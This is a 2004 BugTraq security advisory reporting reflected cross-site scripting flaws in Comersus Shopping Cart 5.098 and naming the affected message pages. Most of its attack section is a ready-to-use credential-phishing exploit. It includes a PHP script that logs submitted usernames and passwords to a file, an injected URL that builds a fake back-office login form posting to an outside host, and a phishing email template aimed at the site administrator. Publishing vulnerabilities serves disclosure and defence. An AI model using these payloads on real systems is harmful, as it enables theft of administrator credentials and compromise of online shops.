BugTraq
Comersus 5.098 XSS Vulnerable Aug 02 2004 11:48AM
Abdul Azis (az001 plasa com)


Comersus Shopping Cart 5.098 XSS Vulnerability

=======================================================

Vulnerable Systems:

* Comersus Cart Version 5.098

Comersus is an open source shopping cart.I found a few XSS Vulnerabilty :

Pages Affected:

/comersus/store/comersus_message.asp

/comersus/backofficeLite/comersus_backoffice_message.asp

Examples:

http://www.target.net/comersus/store/comersus_message.asp?message=<h4>VU
LNERABLE</h4>

http://www.target.net/comersus/backofficelite/comersus_backoffice_messag
e.asp?message=<h4>VULNERABLE</h4>

Try this :

1 Step :

Create a file called comersus.php

<?

$buka = fopen("comersus.txt","a+");

fwrite($buka,"User:".$uid."|"."Password:".$passwd."|");

fclose($buka);

header("Location:http://www.target.net/comersus/backofficelite/comersus_
backoffice_message.asp?message=Your+authentication+data+is+incorrect..."
);

exit();

?>

Next Step :

Open url :

http://www.target.net/comersus/backofficelite/comersus_backoffice_messag
e.asp?message=<form%20action=http://mysite.org/comersus.php%20method=pos
t><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br
>Password<br><input%20type=password%20name=passwd><p><input%20type=submi
t%20value=%20Login%20></form>

Enter user and password,then Submit

After that, enter this url:

http://mysite.org/comersus.txt

This is a result(comersus.txt) :

User:az001|Password:passwordnya|

Sent a fake email from Comersus Site(support (at) comersus (dot) com [email concealed]) to www.target.net admin (ex. admin (at) target (dot) net [email concealed]):

Hello admin (at) target (dot) net [email concealed] blablablablabla ...............................................

................................................................

Please Login with username and password <a href="http://www.target.net/comersus/backofficelite/comersus_backoffice_
message.asp?message=<form%20action=http://mysite.org/comersus.php%20meth
od=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=u
id><br>Password<br><input%20type=password%20name=passwd><p><input%20type
=submit%20value=%20Login%20></form>">here</a>

and Wait until admin execute url

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus